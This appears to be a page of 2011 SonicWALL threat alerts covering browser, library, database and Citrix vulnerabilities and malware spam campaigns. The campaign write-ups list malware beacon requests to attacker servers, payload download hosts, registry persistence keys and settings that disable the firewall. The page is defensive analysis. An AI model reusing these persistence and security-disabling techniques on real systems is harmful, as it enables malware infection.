Posts

Apple Safari WebKit SVG Memory Corruption (Aug 1, 2011)

/in /by

Safari is a web browser developed by Apple Inc. and included with the Mac OS X and iOS operating systems. The browser is capable of processing HTML, images, scripting languages, and various other media formats. Safari is based on Apple’s internal fork of the KHTML rendering engine, called WebKit. WebKit provides the WebCore HTML parser and the JavaScriptCore JavaScript engine.

The Document Object Model (DOM) is a cross-platform and language-independent convention for representing and interacting with objects in HTML, XHTML and XML documents. DOM has a hierarchical structure in which HTML tag and attribute data is stored as elements of this hierarchy. WebKit supports manipulation of DOM objects via “client-side” scripting (e.g. JavaScript), allowing for dynamic modification of an HTML document.

Scalable Vector Graphics (SVG) is a family of specifications of an XML-based file format for describing two-dimensional vector graphics, both static and dynamic. The SVG specification is an open standard that has been under development by the World Wide Web Consortium (W3C) since 1999. SVG is supported by most modern web browsers, including Safari.

A memory corruption vulnerability has been found in the WebKit component of Safari. The vulnerability is due to the corruption of certain pointers in DOM objects relating to SVG elements. An attacker can exploit this vulnerability to inject and execute malicious code in the security context of the logged in user.

SonicWALL UTM team has researched this vulnerability and created the following IPS signatures to capture the attacks in the wild.

  • 1149 Apple Safari SVG Object Memory Corruption 1
  • 1158 Apple Safari SVG Object Memory Corruption 2

This vulnerability has been referred by CVE as CVE-2011-0222.

Wrong Hotel transaction spam campaign (July 28, 2011)

/in /by

SonicWALL UTM Research team observed a new spam campaign pretending to be from known hotels like Embassy suites, Marriott, etc in the wild. The e-mail contains an apology note from Hotel’s reservation department listing details about a wrong transaction applied to your credit card. It further asks the user to download and fill out the refund form attached with the e-mail. The e-mail attachment is a zip file which contains a malicious Fake AV Downloader Trojan executable.

A sample e-mail message looks like:

screenshot

A sample list of e-mail subjects showing various Hotels masqueraded in this campaign till now:

screenshot

The executable file inside the zip attachment has an icon disguised as a Microsoft Excel file:

screenshot

The file if executed will perform activity similar to what we have seen in previous variants:

  • Creates a process SVCHOST.EXE and injects code into it.

  • Reports the infected machine to a server on domain yomwar(REMOVED).ru by sending the following GET request:
    • GET /forum3/task.php?bid=a67a41eXXXXX23&os=5-1-2600&uptime=0&rnd=229125

  • Drops following files
    • (Startup)dxdiag.exe [Copy of itself that starts upon system re-boot and runs the Fake AV]
    • (Application Data)gL11000PgAgJ11000gL11000PgAgJ11000.exe [GAV: Fakesysdef.BDO (Trojan) downloaded from radio-80.com

      • ]

  • Deletes the original copy of the file.

  • Runs the downloaded new Fake AV Trojan variant which performs following activity after a 500 milisecond sleep:
    • Displays multiple fake infections in Rogue AV GUI

      • screenshot

    • Unlike previous Fake AV variants it does not hide the user program files but instead makes them unusable. It terminates any user initiated processes displaying a fake alert message

      • screenshot

    • Prompts user to purchase the full version in order to clean up the fake infections

      • screenshot

SonicWALL Gateway AntiVirus provides protection against this threat via following signatures:

  • GAV: Injecter.GFY (Trojan)
  • GAV: Zbot.ASK_2 (Trojan)
  • GAV: Kryptik.QUV (Trojan)

libsndfile PAF File Integer Overflow (July 28, 2011)

/in /by

libsndfile is a widely-used C library for reading and writing audio files. It supports a wide variety of audio encodings and sound file formats and will convert automatically from one to another. In addition to the library itself, the package provides command-line programs for converting one format to another (sndfile-convert), for playing audio files (sndfile-play), and for obtaining information about the contents of an audio file (sndfile-info).

libsndfile supports many different audio file formats, including Creative Technology’s (formerly Ensoniq’s) Professional Audio Recording Integrated System (PARIS) Audio Format (PAF). The PAF is a linear Pulse-code modulation (PCM) based format that can store 8, 16, or 24-bit samples. The format of the PAF file header is:

 Offset Length Description ----------------------------------------------------------------------- 0x0000 4 File format marker (also determines header endianess) 0x0004 4 Version 0x0008 4 Endianess specification 0x000C 4 Sample rate 0x0010 4 Format (sample size) 0x0014 4 Number of Channels 0x0018 4 Source

An integer buffer overflow vulnerability exists in the PAF processing code of the libsndfile library. The vulnerable codes do not validate the provided PAF file data when it’s calculating the memory size to allocate, which may cause an integer overflow. A remote, unauthenticated attacker can exploit this vulnerability to inject and execute arbitrary code in the context of the affected user.

SonicWALL UTM team has researched and analyzed this vulnerability. Two IPS signatures have been created to detect/prevent the attacks addressing this issue.

  • 1109 libsndfile PAF File Integer Overflow 1
  • 1111 libsndfile PAF File Integer Overflow 2

This vulnerability has been assigned by CVE as CVE-2011-2696

Oracle Warehouse Builder SQL Injection (July 22, 2011)

/in /by

Oracle Warehouse Builder (OWB) is an Extract, Transform, and Load (ETL) tool for managing data for business intelligence systems. Every Oracle 11g database product includes OWB as a bundled component. The Oracle Database supports querying and programming with the Structured Query Language (SQL), PL/SQL (Procedural Language / SQL), and Java. PL/SQL is Oracle’s procedural extension to SQL allowing the use of variables, conditional and loop constructs, functions, as well as some object-oriented features. PL/SQL program units can be pre-compiled and stored in the database. The Java runtime is also integrated with the SQL and PL/SQL database engines and enables the use of Java in stored procedures.
An example of a PL/SQL procedure which includes Java code is shown: 

create or replace and resolve java source named "TESTING" as import java.lang.*; import java.io.*; public class Hello {   public static void HelloWorld() {     System.out.println("This is a test");   } }

The OWB by default includes a database user OWBREPOS_OWNER. This user has a number of critical roles and privileges which enable it to read all data in the database (including user hashes). The user OWBREPOS_OWNER can also execute OS commands and can therefore obtain SYSDBA right.

A privilege escalation vulnerability has been found in Oracle Warehouse Builder. A specific stored procedure in the OWBREPOS_OWNER package performs insufficient input validation on all of its parameters. The said procedure has execute permissions granted to PUBLIC by default. By inserting escaped single quotes (denoted by two single quotes) into one of the parameter strings, SQL, PL/SQL, and Java code can be injected to be executed as OWBREPOS_OWNER.

An attacker with limited user privileges could use this vulnerability to read arbitrary data including password hashes from the database, and execute arbitrary SQL, PL/SQL and Java code, and operating system commands in the security context under which the database is running, effectively compromising the database server completely.

SonicWALL has multiple generic IPS signatures which address SQL injection attempts. The following IPS signatures are proactively addressing attacks targeting this vulnerability.

  • 1421 – SQL-INJECTION Generic SQL Injection Attempt 7
  • 1661 – SQL-INJECTION Generic SQL Injection Attempt 8
  • 4161 – SQL-INJECTION Generic SQL Injection Attempt 16

This vulnerability has been assigned the identifier CVE-2011-0799 by mitre.
The vendor has released an advisory addressing this issue.

Email Spam leads to Banking Trojan (July 21, 2011)

/in /by

Sonicwall UTM research team received reports of a new online banking Trojan seen in the wild. This Trojan steals security credentials used to manage various online banking accounts targeting South American Bank Caixa Group.

Users will receive an email similar to the screenshot below related to banking transaction. The email contains a link purportedly to be the proof or receipt of the transaction but otherwise leads to downloading of the banking trojan.

    screenshot

    Translated to English:

    Portuguese – detected to English translation
    ————————————————–
    PROOF OF SCHEDULE
    ————————————————–

    Please be advised that scheduling was made in Internal Transfer
    BPI service online, with the following data:

    Schedule Date – 07/18/2011 06:16
    Operation Type – Issuance of checks on foreign
    Nr Documento2342576678899 (9.12 kb)

The email link leads to a compromised website which serves the trojan: http://cla{REMOVED}ua/…/bpi23045.asp

Once the user clicks on the link, it will display the message below showing that the Adobe Reader is outdated and redirects it to the download page.

    screenshot

The Adobe Reader download page is fake and will actually serve the banking trojan.

    screenshot

    screenshot

In order to disguise the banking trojan as a legitimate installer, it uses Adobe Flash icon shown below:

After installation, the trojan will launch these pages to let the user think that it installed a legitimate Adobe Reader and will ultimately show the online banking transaction.

    screenshot

    screenshot

Installed files:

  • %systemdir%1kl1.exe [ detected as GAV: VBKrypt.CQZR (Trojan) ]
  • %systemdir%xservicex.exe [ detected as GAV: VBKrypt.CQZR (Trojan) ]
  • %temp%header_10.1.45.2.exe [ detected as GAV: VBKrypt.CQZR (Trojan) ]

Added Registry:

  • Key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
    Value: xservicex
    Data:”%systemdir%1kl1.exe”

Network Activity:

HTTP Requests:

  • http://www.ca{REMOVED}/lnkFloud.php
  • http://www.d{REMOVED}tyjytj/…/c.php
  • http://sch{REMOVED}/willkohead.png

SonicWALL Gateway AntiVirus provided proactive protection against this threat via the following existing signatures:

  • GAV: VBKrypt.CQZR (Trojan)
  • GAV: Banker.UTV (Trojan)

screenshot

XP Internet Security 2012. FakeAV trend continues. (Jul 14, 2011)

/in /by

The Sonicwall UTM research team received reports of a FakeAV called XP Internet Security 2012. FakeAV software of this nature continues to be a steady growing trend and has been covered in some of our previous SonicALERTs. Once infected, this software will disable the Windows firewall, Windows automatic updates and Windows Security Center antivirus notifications. It will then proceed with its campaign to sell the software to the infected victim.

The Trojan performs the following DNS query:

      hises{removed}.com

The Trojan brings up the following fake system scan dialogs a few seconds after infection:

The Trojan periodically brings up the following messages in an attempt to encourage the user to buy the software:

The Trojan makes the following GET request to a remote webserver (hises{removed}.com):

The Trojan was seen receiving the following data in response to the above GET request:

The Trojan creates the following files on the filesystem:

  • C:Documents and Settings{USER}Local SettingsApplication Datauwk.exe [Detected as GAV: Kryptik.QFG (Trojan)]
  • C:Documents and SettingsAll UsersApplication Datac1xisgac1m22i0vav24c46v8xoky2du4 [Detected as GAV: Kryptik.QFG_2 (Trojan)]
  • C:Documents and Settings{USER}Local SettingsApplication Datac1xisgac1m22i0vav24c46v8xoky2du4 [Detected as GAV: Kryptik.QFG_2 (Trojan)]
  • C:Documents and Settings{USER}Local SettingsApplication Datac1xisgac1m22i0vav24c46v8xoky2du4 [Detected as GAV: Kryptik.QFG_2 (Trojan)]
  • C:Documents and Settings{USER}Local SettingsTempc1xisgac1m22i0vav24c46v8xoky2du4 [Detected as GAV: Kryptik.QFG_2 (Trojan)]
  • C:Documents and Settings{USER}Templatesc1xisgac1m22i0vav24c46v8xoky2du4 [Detected as GAV: Kryptik.QFG_2 (Trojan)]

The Trojan creates the following registry keys in the Windows registry:

    Enable startup:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun 453461717 “C:Documents and Settings{USER}Local SettingsApplication Datauwk.exe”

    • Shell spawning:

  • HKEY_CLASSES_ROOT.exeshellopencommand @ “”C:Documents and Settings{USER}Local SettingsApplication Datauwk.exe”
  • HKEY_CURRENT_USERSoftwareClasses.exeshellopencommand @ “”C:Documents and Settings{USER}Local SettingsApplication Datauwk.exe”
  • HKEY_CURRENT_USERSoftwareClassesexefileshellopencommand @ “”C:Documents and Settings{USER}Local SettingsApplication Datauwk.exe”

    • Disable windows firewall and notifications:

  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyDomainProfile EnableFirewall dword:00000000
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyDomainProfile DoNotAllowExceptions dword:00000000
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyDomainProfile DisableNotifications dword:00000001
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfile EnableFirewall dword:00000000
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfile DoNotAllowExceptions dword:00000000
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfile DisableNotifications dword:00000001

The Trojan makes the following registry modifications:

    Disable windows antivirus check and notifications:

  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center AntiVirusDisableNotify dword:00000000 dword:00000001
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center FirewallDisableNotify dword:00000000 dword:00000001
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center UpdatesDisableNotify dword:00000000 dword:00000001
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center AntiVirusOverride dword:00000000 dword:00000001
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center FirewallOverride dword:00000000 dword:00000001

The Trojan deletes everything under the following registry keys to disable Windows automatic updates:

  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_WUAUSERV
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Kryptik.QFG (Trojan)
  • GAV: Kryptik.QFG_2 (Trojan)

Microsoft Security Bulletin Coverage (July 12, 2011)

/in /by

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of July, 2011. A list of issues reported, along with SonicWALL coverage information follows:

MS11-053 Vulnerability in Bluetooth Stack Could Allow Remote Code Execution (2566220)

  • Bluetooth Stack Vulnerability – CVE-2011-1265
    Attacks targeting this vulnerability would occur over Bluetooth.

MS11-054 Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2555917)

  • Win32k Use After Free Vulnerability – CVE-2011-1874
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1875
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1876
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1877
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1878
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1879
    This is a local vulnerability.
  • Win32k Null Pointer De-reference Vulnerability – CVE-2011-1880
    This is a local vulnerability.
  • Win32k Null Pointer De-reference Vulnerability – CVE-2011-1881
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1882
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1883
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1884
    This is a local vulnerability.
  • Win32k Null Pointer De-reference Vulnerability – CVE-2011-1885
    This is a local vulnerability.
  • Win32k Incorrect Parameter Validation Allows Information Disclosure Vulnerability – CVE-2011-1886
    This is a local vulnerability.
  • Win32k Null Pointer De-reference Vulnerability – CVE-2011-1887
    This is a local vulnerability.
  • Win32k Null Pointer De-reference Vulnerability – CVE-2011-1888
    This is a local vulnerability.

MS11-055 Vulnerability in Microsoft Visio Could Allow Remote Code Execution (2560847)

  • Microsoft Visio Insecure Library Loading Vulnerability – CVE-2011-3148
    IPS 5726 Possible Binary Planting Attempt

MS11-056 Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2507938)

  • CSRSS Local EOP AllocConsole Vulnerability – CVE-2011-1281
    This is a local vulnerability.
  • CSRSS Local EOP SrvSetConsoleLocalEUDC Vulnerability – CVE-2011-1282
    This is a local vulnerability.
  • CSRSS Local EOP SrvSetConsoleNumberOfCommand Vulnerability – CVE-2011-1283
    This is a local vulnerability.
  • CSRSS Local EOP SrvWriteConsoleOutput Vulnerability – CVE-2011-1284
    This is a local vulnerability.
  • CSRSS Local EOP SrvWriteConsoleOutputString Vulnerability – CVE-2011-1870
    This is a local vulnerability.

Financial spam campaigns on the rise (July 08, 2011)

/in /by

SonicWALL UTM Research team continued to observe a increase in financial spam campaigns pretending to be from a credit card company. The email attempts to grab the reader’s attention by stating that their credit card bill is overdue. The attachment in the email purporting to be a financial statement is a newer variant of the FakeAV we analyzed earlier.

The spam campaign is shown below:

screenshot

It performs the following activities when executed:

  • It creates the following files:
    • Start MenuProgramsStartupdxdiag.exe (Copy of itself) [Detected as GAV: Aspxor.Y (Trojan)]
    • WINDOWSsystem32aspimgr.exe [Detected as GAV: Danmec.E (Trojan)]
    • WINDOWSdvcbdt1.dll [Detected as GAV: Mufanom.BLDH (Trojan)]
    • %temp%rrtegggggggg[1].exe [Detected as GAV: FakeAV.AHV (Trojan)]
    • %temp%gggssgsdggg[1].exe [Detected as GAV: Mufanom.BLDH (Trojan)]
    • %temp%bibalabibabuba[1].exe [Detected as GAV: Aspxor.Z (Trojan)]

  • It reports new infection to a remote server:
    • GET /forum1/task.php?bid=462e39cb208270ad&os=5-1-2600&uptime=0&rnd=574609 HTTP/1.1

  • It downloads further files from a remote server using a custom user-agent string:
    • GET /forum1/load.php?module=grabbers HTTP/1.1
      User-Agent: Our_Agent

  • It creates the following registry entry to ensure infection on reboot:
    • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun Ulazebebebag “rundll32.exe “C:WINDOWSdvcbdt1.dll”,Startup”

  • It displays fake scans and infections and prompts the user to purchase the product in order to clean their computer.

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: Oficla.FS (Trojan)
  • GAV: Oficla.FS#email (Trojan)
  • GAV: Aspxor.Y (Trojan)
  • GAV: Aspxor.Z (Trojan)
  • GAV: Danmec.E (Trojan)
  • GAV: Mufanom.BLDH (Trojan)
  • GAV: FakeAV.AHV (Trojan)

screenshot

Citrix Provisioning Services Buffer Overflow (Jul 8, 2011)

/in /by

Citrix Provisioning Services is a workload (operating system, application, and configuration) management system. It maximizes flexibility of hardware resources by making no software preloaded on the systems; instead, computers will obtain application from the network in real-time. A proprietary communication protocol is used between the Provisioning Server and other components.

Several buffer overflow vulnerabilities exist in the Citrix Provisioning Services. Specifically, the vulnerabilities are due to insufficient validation of data sent to the streamprocess.exe, which listens on port 6905/udp. An attacker can exploit these vulnerabilities by sending crafted packets to the target server. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the streamprocess.exe. Code injection that does not result in execution would terminate the service due to memory corruption.

SonicWALL has released several IPS signatures to detect and block known exploits targeting these vulnerabilities. The signatures are listed below:

  • 6346 – Citrix Provisioning Services Buffer Overflow 1
  • 6794 – Citrix Provisioning Services Buffer Overflow 2

Fake Credit Card and IRS notices (June 30, 2011)

/in /by

SonicWALL UTM Research team observed two new spam campaigns in the past few days pretending to contain notices from a Credit Card company or the Internal Revenue Service (IRS). The e-mails contain Downloader Trojan Chepvil as attachment. Chepvil is a Trojan that silently downloads and installs malware components or other malware which includes Rouge AV. SonicWALL has received more than 100,000 copies of emails from these spam campaigns till now delivering 74 unique malicious binaries and it is still active at the time of writing this article.

Campaign #1 – Credit Card Overdue notice spam

Subject:

  • Credit Card Overdue

Attachment: Customer details.zip (contains Customer details.exe)

The e-mail message looks like below:

screenshot

Campaign #2 – IRS notification spam

Subject:

  • IRS notification

Attachment: IRS document.zip (contains IRS document.exe)

The e-mail message looks like below:

screenshot

The executable file inside the zip attachment has an icon disguised as a Acrobat Reader PDF file:

screenshot

If the user downloads and executes the malicious executable inside the zip attachment, it performs the following activity:

  • Creates a process SVCHOST.EXE and injects code into it.

  • Deletes the original copy of the file.

  • Reports the infected machine by sending the following GET request:
    GET /404.php?type=stats&affid=531&subid=01&awok HTTP/1.1
    User-Agent: IE
    Host: click(REMOVED).org

  • Downloads Fake AV Trojan from a remote server mysteryforyou1.ru to the following location and executes it:

    • (Application Data)dRBAHQLTbF.exe – [ detected as GAV: FakeAV.PSL (Trojan) ]

  • Fake AV Trojan moves all the user programs into (TEMP)smtmp(N) [where N = 1,2,3..] periodically making them unavailable to the user and also hides the user files. Commands and features found in the analysis are shown below:

    screenshot

    Languages supported:

    screenshot

    More details about this Fake AV Trojan functionality can be found in one of our previous sonicalerts – Fake Desktop Utilities on the rise (June 8, 2011)

  • Other dropped files include:
    • (TEMP)trol.exe – [ detected as GAV: Agent.SEO (Trojan) ]
    • (TEMP)javaw.exe – [ detected as GAV: Suspicious#polycrypt.4_2 (Worm) ]

  • Registry modification to ensure Fake AV runs upon system reboot:
    • Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionRun
      Value: dRBAHQLTbF
      Data:(Application Data)dRBAHQLTbF.exe

    • SonicWALL Gateway AntiVirus blocks the spammed Downloader Trojan Chepvil proactively via following signature:

    • GAV: Suspicious#Chepvil.K (Trojan)

    screenshot